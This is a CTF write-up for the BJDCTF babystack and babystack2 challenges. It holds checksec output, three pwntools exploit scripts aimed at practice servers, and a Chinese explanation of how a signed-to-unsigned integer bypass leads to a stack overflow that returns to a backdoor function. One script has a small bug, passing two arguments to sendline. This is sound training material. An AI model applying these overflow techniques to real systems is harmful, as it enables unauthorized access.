bjdctf-2022-babystack-babystack-2 Writeups

Babystack

checksec:

# zhailin @ DESKTOP-4OQQP8F in ~/Pwns/ROP/bjdctf_2020_babystack [21:38:28] 
$ checksec bjdctf_2020_babystack
[*] '/home/zhailin/Pwns/ROP/bjdctf_2020_babystack/bjdctf_2020_babystack'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

exp:

from pwn import *

r = remote('node5.buuoj.cn',29701)

r.sendline('50') # 随便一个远大于buf的数
payload = b'a'*24 + p64(0x4006E6) # 0x4006E6是在IDA中找到的后门函数
r.sendline(payload)
r.interactive()

Babystack2

exp1:

from pwn import *
# from LibcSearcher import *

context(os = "linux", arch = "amd64", log_level= "debug")
p = remote('node5.buuoj.cn',27319)

backdoor = 0x400726
p.sendline("length of your name:", "2147483649")
payload = b'a' * 0x18 + p64(backdoor)
p.sendlineafter("name?", payload)
p.sendline("cat flag")

p.interactive()

exp2:

from pwn import *
io = remote('node5.buuoj.cn',27319)

backdoor = 0x0400726
payload = b'a' * 0x18 + p64(backdoor)

io.sendlineafter('name:','-1')
io.sendlineafter('name?',payload)
io.interactive()

解释一下，在ida中我们分析出其中这道题涉及无符号整型数，以下是disasm出来的代码片段：

if ( (int)nbytes > 10 )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);
  return 0;

对于nbytes > 10，如果我们想让read函数存在溢出那么nbytes需要大于0x10，但被限制了，于是这里存在一个整数溢出，如果我们输入的是-1那么就可以绕过if条件了，同时可以看到read函数的nbytes是unsigned int，unsigned int是无符号整型，遇到-1就会变成unsigned int的最大值，这样就可以让栈溢出。